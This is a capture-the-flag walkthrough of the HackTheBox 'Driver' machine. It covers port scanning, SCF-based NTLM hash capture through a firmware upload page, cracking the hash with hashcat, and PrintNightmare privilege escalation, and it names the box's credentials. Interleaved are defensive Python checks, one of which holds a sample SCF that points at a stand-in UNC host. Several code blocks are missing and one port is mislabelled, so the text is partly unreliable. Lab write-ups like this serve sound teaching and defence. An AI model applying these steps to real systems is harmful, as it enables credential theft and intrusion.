# Driver

## Enumeration

### Nmap

First, let's scan for open ports using nmap. We can quickly scan for open ports and store them in a variable:

```bash
ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.106 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
```

Then, we can scan those specific ports in depth by running nmap's built-in scripts:

```bash
nmap -p$ports -sC -sV 10.10.11.106
```
### Port 80

Going to the website on port 80 gives an HTTP authentication dialogue box. Signing in with the credentials `admin:admin` works. There is a `fw_up.php` page where we can upload firmware, but there doesn't seem to be an accessible location where those files get uploaded to.

A directory bruteforce scan reveals nothing:

```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.106/FUZZ
```
### Port 5985 (WinRM)

### Port 135 (Samba)
Essentially, an SCF file is used to control Windows Explorer. So, when a user browses to a folder containing an SCF file, Windows will use the contents of that file. We can create an SCF file like this:

We can set `X.X.X.X` to our attacker's IP address. Since the `IconFile` field is set to a UNC path, Windows will request the icon from the attacker's host and try to authenticate with the browsing user's credentials; the attacker's listener then issues an NTLM challenge, and Windows returns the challenge response containing the NTLM hash.
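Seen from the other side of this upload form, the thing a defender wants is a check that refuses Explorer-parsed files whose `IconFile` points at a UNC share before they ever land in a browsable folder. The following is an added example and not code from the write-up or from the box: a small INI/SCF parser plus an upload-gate function of the kind a handler like `fw_up.php` could call. The sample inputs (the `192.0.2.10` host, the file names) are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# INI keys whose value Explorer resolves as a file path; IconFile is the one
# the SCF technique relies on.
PATH_KEYS = {"iconfile"}

# A UNC path: two leading backslashes, a host, then an optional share path.
UNC_RE = re.compile(r"^\\\\([^\\\s]+)(\\.*)?$")


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a minimal INI/SCF structure into {section: {key: value}}.

    Section names and keys are lower-cased so lookups are case-insensitive,
    matching how Windows treats them.
    """
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line:
            key, _, value = line.partition("=")
            sections.setdefault(current, {})[key.strip().lower()] = value.strip()
    return sections


def find_unc_references(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, host) for every path-valued key pointing at a UNC share."""
    hits = []
    for section, kv in parse_ini(text).items():
        for key, value in kv.items():
            if key in PATH_KEYS:
                m = UNC_RE.match(value)
                if m:
                    hits.append((section, key, m.group(1)))
    return hits


def is_scf_beacon(data: bytes) -> bool:
    """True if the bytes look like an SCF whose [Shell] IconFile lives on a remote host."""
    text = data.decode("utf-8", errors="replace").lstrip("\ufeff")  # tolerate a BOM
    return any(section == "shell" and key == "iconfile"
               for section, key, _host in find_unc_references(text))


def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Decision an upload handler could apply: reject SCF-style files with UNC icon paths.

    The extension check catches the obvious case; the content check catches a
    renamed file, since Explorer keys off the [Shell] section, not the name.
    """
    if filename.lower().endswith(".scf") or is_scf_beacon(data):
        text = data.decode("utf-8", errors="replace")
        hosts = sorted({h for _, _, h in find_unc_references(text)})
        return False, f"rejected: SCF-style file with UNC IconFile -> {hosts}"
    return True, "accepted"


# Constructed samples for the example (not files from the box).
SAMPLE_SCF = "[Shell]\r\nIconFile=\\\\192.0.2.10\\share\\icon.ico\r\n".encode()
BENIGN_SCF = "[Shell]\r\nIconFile=C:\\Windows\\explorer.exe,3\r\n".encode()
FIRMWARE_BLOB = b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 16

if __name__ == "__main__":
    for name, blob in [("firmware.bin", SAMPLE_SCF),
                       ("firmware.bin", BENIGN_SCF),
                       ("firmware.bin", FIRMWARE_BLOB)]:
        print(name, check_upload(name, blob))
```

The content check matters more than the extension check: the write-up's upload form accepts "firmware", so a defender should assume the attacker controls the file name and key the decision on what Explorer would actually parse. Blocking outbound SMB at the network edge is the complementary control, since the icon request never needs to leave the network.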
## Foothold

Then, we upload the following SCF file using the firmware upload page (`fw_up.php`) on port 80.

Responder outputs the following:

We have our NTLM hash!
### Cracking the NTLM Hash

We can crack this hash with `hashcat`. We first find the `hashcat` mode needed for NTLMv2 hashes with `hashcat --help | grep NTLMv2`, which shows us the correct mode is `5600`.

So, we paste the hash into a file called `hash` and then run `hashcat` with:

```bash
hashcat -a 0 -m 5600 hash rockyou.txt
```

The password is `liltony`.
### Evil WinRM

We get a shell on the machine! Now, we can get the `user.txt` flag with `cat ..\Desktop\user.txt`.
## Privilege Escalation

To get a metasploit shell, run the following on the attacker:

Then, through `evil-winrm` on the target, run `upload e.exe` and then `.\e.exe`.

Then, back in the meterpreter, run `background` to get back to the `msf` console. Then run `use post/multi/recon/local_exploit_suggester`, set the session with `set session 1`, and run the module to get a list of possible exploits. This reveals nothing.
So, the actual exploit that should be used is CVE-2021-1675/CVE-2021-34527, or PrintNightmare. After enough searching one may find this exploit because the `spoolsv` service is running, as shown in WinPEAS's "Current TCP Listening Ports" output (and when simply running `ps`):
Originally, I saw the `[!] failed to get current driver list` error message, but after resetting the box it worked:
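The reason the spooler is worth noticing is that PrintNightmare only works when the service is up and the Point and Print policy lets non-administrators install drivers. As an added example (not part of the write-up, and not what was run on the box), the following assesses that state from the registry values Microsoft's guidance for CVE-2021-34527 names: the Spooler service start type, and `NoWarningNoElevationOnInstall`, `UpdatePromptSettings` and `RestrictDriverInstallationToAdministrators` under the `PointAndPrint` policy key. The `read_live_state` helper and the sample host states are constructed for the example.

```python
from typing import Dict, List, Optional

# HKLM\SYSTEM\CurrentControlSet\Services\Spooler\Start: 2 = auto, 3 = manual, 4 = disabled
SERVICE_DISABLED = 4

SPOOLER_KEY = r"SYSTEM\CurrentControlSet\Services\Spooler"
POINT_AND_PRINT_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

State = Dict[str, Optional[int]]  # None means the value is absent


def assess_spooler(state: State) -> List[str]:
    """Return one finding per weakness; an empty list means the host is hardened.

    Absent NoWarningNoElevationOnInstall / UpdatePromptSettings are the secure
    default (prompts enabled). RestrictDriverInstallationToAdministrators is
    only treated as safe when it is explicitly 1, because hosts without the
    August 2021 update do not apply that restriction by default.
    """
    findings: List[str] = []
    if state.get("spooler_start") == SERVICE_DISABLED:
        return findings  # service off: the driver-install RPC surface is not reachable
    if state.get("NoWarningNoElevationOnInstall") not in (None, 0):
        findings.append("NoWarningNoElevationOnInstall != 0: driver installs are not prompted/elevated")
    if state.get("UpdatePromptSettings") not in (None, 0):
        findings.append("UpdatePromptSettings != 0: driver updates are not prompted")
    if state.get("RestrictDriverInstallationToAdministrators") != 1:
        findings.append("RestrictDriverInstallationToAdministrators not set to 1: "
                        "non-admins may be able to install printer drivers")
    return findings


def is_hardened(state: State) -> bool:
    """True when the spooler is disabled or Point and Print is restricted to admins."""
    return not assess_spooler(state)


def read_live_state() -> State:
    """Read the same values from the local registry (Windows only; assumed helper)."""
    import winreg  # imported here so the module still loads on non-Windows hosts

    def dword(key_path: str, name: str) -> Optional[int]:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
                value, _ = winreg.QueryValueEx(key, name)
                return int(value)
        except FileNotFoundError:  # key or value absent
            return None

    return {
        "spooler_start": dword(SPOOLER_KEY, "Start"),
        "NoWarningNoElevationOnInstall": dword(POINT_AND_PRINT_KEY, "NoWarningNoElevationOnInstall"),
        "UpdatePromptSettings": dword(POINT_AND_PRINT_KEY, "UpdatePromptSettings"),
        "RestrictDriverInstallationToAdministrators":
            dword(POINT_AND_PRINT_KEY, "RestrictDriverInstallationToAdministrators"),
    }


# Constructed host states for the example (not readings from the box).
EXPLOITABLE_STATE: State = {"spooler_start": 2, "NoWarningNoElevationOnInstall": 1,
                            "UpdatePromptSettings": 1,
                            "RestrictDriverInstallationToAdministrators": None}
HARDENED_STATE: State = {"spooler_start": 2, "NoWarningNoElevationOnInstall": 0,
                         "UpdatePromptSettings": 0,
                         "RestrictDriverInstallationToAdministrators": 1}
DISABLED_STATE: State = {"spooler_start": 4}

if __name__ == "__main__":
    import sys
    state = read_live_state() if sys.platform == "win32" else EXPLOITABLE_STATE
    for finding in assess_spooler(state) or ["no findings: spooler hardened or disabled"]:
        print(finding)
```

On a host that does not need to serve printers, disabling the service is the simplest fix; where it must stay up, the three policy values above are what to audit, and a `spoolsv` entry in a listening-ports listing like the one WinPEAS produced here is the cue to go and check them.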
Now, all we have to do is connect with `evil-winrm` as our newly created administrator user `john`: `evil-winrm -u john -p SuperSecure -i 10.10.11.106`. We can get the `root.txt` flag with `cat C:\Users\Administrator\Desktop\root.txt`.